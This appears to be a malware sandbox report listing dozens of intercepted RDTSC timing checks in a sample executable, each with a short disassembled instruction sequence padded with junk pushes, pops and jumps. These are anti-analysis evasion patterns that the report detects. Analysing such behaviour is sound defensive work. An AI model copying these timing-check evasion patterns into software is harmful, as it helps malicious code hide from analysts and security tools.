Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 176E57F second address: 176E583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 176E583 second address: 176E5B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4EE1C58h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC7F4EE1C55h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1774C02 second address: 1774C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC7F4B4AE76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1774C0C second address: 1774C10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1774C10 second address: 1774C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1774C16 second address: 1774C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1774C1C second address: 1774C30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC7F4B4AE7Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1774F55 second address: 1774F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC7F4EE1C4Dh 0x0000000e jmp 00007FC7F4EE1C50h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1774F7B second address: 1774F97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE7Fh 0x00000007 jne 00007FC7F4B4AE76h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1775511 second address: 1775521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC7F4EE1C46h 0x0000000a popad 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17757F8 second address: 17757FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17757FF second address: 177581C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4EE1C53h 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FC7F4EE1C46h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 177581C second address: 1775820 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 177699F second address: 17769D8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 jp 00007FC7F4EE1C46h 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 jmp 00007FC7F4EE1C4Ah 0x00000015 jl 00007FC7F4EE1C46h 0x0000001b jg 00007FC7F4EE1C46h 0x00000021 popad 0x00000022 jmp 00007FC7F4EE1C4Fh 0x00000027 push ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 177A941 second address: 177A945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16D1B53 second address: 16D1B5D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC7F4EE1C46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16D1B5D second address: 16D1B63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16D1B63 second address: 16D1B6D instructions: 0x00000000 rdtsc 0x00000002 je 00007FC7F4EE1C46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1779A8D second address: 1779AA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC7F4B4AE83h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1779C27 second address: 1779C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1779C2B second address: 1779C35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1779C35 second address: 1779C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1779D54 second address: 1779D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1779D58 second address: 1779D76 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC7F4EE1C52h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1779D76 second address: 1779D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1779D7C second address: 1779D8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4EE1C4Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1779D8E second address: 1779DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC7F4B4AE82h 0x0000000d jmp 00007FC7F4B4AE88h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1779DC0 second address: 1779DC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1779DC4 second address: 1779DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7F4B4AE7Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 177A333 second address: 177A349 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4EE1C4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 177A349 second address: 177A34F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 177A34F second address: 177A356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 177A356 second address: 177A35D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 177A35D second address: 177A37C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7F4EE1C59h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16D000F second address: 16D0019 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC7F4B4AE76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1786BAE second address: 1786BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FC7F4EE1C58h 0x0000000a jmp 00007FC7F4EE1C58h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1786BE9 second address: 1786C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7F4B4AE84h 0x00000009 js 00007FC7F4B4AE76h 0x0000000f popad 0x00000010 jmp 00007FC7F4B4AE88h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1786D7C second address: 1786D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1786D86 second address: 1786D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17871A1 second address: 17871A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17871A7 second address: 17871AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 178C7A3 second address: 178C7A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1790424 second address: 179043B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 179043B second address: 179043F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 179C32C second address: 179C34B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC7F4B4AE76h 0x0000000a pop esi 0x0000000b popad 0x0000000c pushad 0x0000000d jns 00007FC7F4B4AE7Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 179C34B second address: 179C351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 179C351 second address: 179C355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 179C355 second address: 179C359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 179C359 second address: 179C369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007FC7F4B4AE7Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 179BFFF second address: 179C02A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jns 00007FC7F4EE1C46h 0x0000000c jne 00007FC7F4EE1C46h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 js 00007FC7F4EE1C4Ch 0x0000001b ja 00007FC7F4EE1C46h 0x00000021 popad 0x00000022 jg 00007FC7F4EE1C5Fh 0x00000028 push ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17A35D4 second address: 17A35E3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC7F4B4AE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17A7E2D second address: 17A7E43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7F4EE1C50h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16DA339 second address: 16DA33F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17B04EF second address: 17B04FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17B04FB second address: 17B0506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC7F4B4AE76h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17B8E89 second address: 17B8E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17B8E8D second address: 17B8EA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE80h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17B7906 second address: 17B7919 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC7F4EE1C46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jg 00007FC7F4EE1C46h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17B7919 second address: 17B792F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC7F4B4AE7Dh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17B792F second address: 17B7939 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC7F4EE1C46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17B7939 second address: 17B794F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC7F4B4AE7Dh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17B7B23 second address: 17B7B3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4EE1C50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17B7B3B second address: 17B7B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17B7B3F second address: 17B7B45 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17B7F9C second address: 17B7FB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE87h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17B7FB9 second address: 17B7FC5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC7F4EE1C4Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17B8BAF second address: 17B8BB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17B8BB5 second address: 17B8BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17BC729 second address: 17BC72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17BC72F second address: 17BC751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FC7F4EE1C4Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007FC7F4EE1C46h 0x00000016 ja 00007FC7F4EE1C46h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17BC751 second address: 17BC75B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC7F4B4AE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17BC75B second address: 17BC760 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17F7542 second address: 17F7548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17F7548 second address: 17F754E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17F73B0 second address: 17F73CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7F4B4AE87h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17FD362 second address: 17FD38A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC7F4EE1C51h 0x00000008 jmp 00007FC7F4EE1C50h 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 180AA8A second address: 180AA8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 180AA8F second address: 180AABA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7F4EE1C50h 0x00000009 jmp 00007FC7F4EE1C57h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 180D5E6 second address: 180D5F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FC7F4B4AE76h 0x0000000d jnp 00007FC7F4B4AE76h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 180D77C second address: 180D7B9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC7F4EE1C58h 0x0000000d jmp 00007FC7F4EE1C50h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC7F4EE1C4Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 180D7B9 second address: 180D7C9 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC7F4B4AE7Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 18D17E8 second address: 18D180E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC7F4EE1C46h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC7F4EE1C59h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 18D19B7 second address: 18D19BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 18D19BD second address: 18D19C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 18D1D3E second address: 18D1D48 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC7F4B4AE76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 18D2098 second address: 18D20A8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC7F4EE1C52h 0x00000008 jns 00007FC7F4EE1C46h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 18D20A8 second address: 18D20B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 18D20B2 second address: 18D2104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FC7F4EE1C55h 0x00000011 jmp 00007FC7F4EE1C4Ch 0x00000016 jno 00007FC7F4EE1C46h 0x0000001c popad 0x0000001d jmp 00007FC7F4EE1C59h 0x00000022 pushad 0x00000023 push edx 0x00000024 pop edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 18D2695 second address: 18D26AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC7F4B4AE7Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 18D26AC second address: 18D26B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 18D54A9 second address: 18D54AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 18D56E7 second address: 18D56F1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 18D56F1 second address: 18D56F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
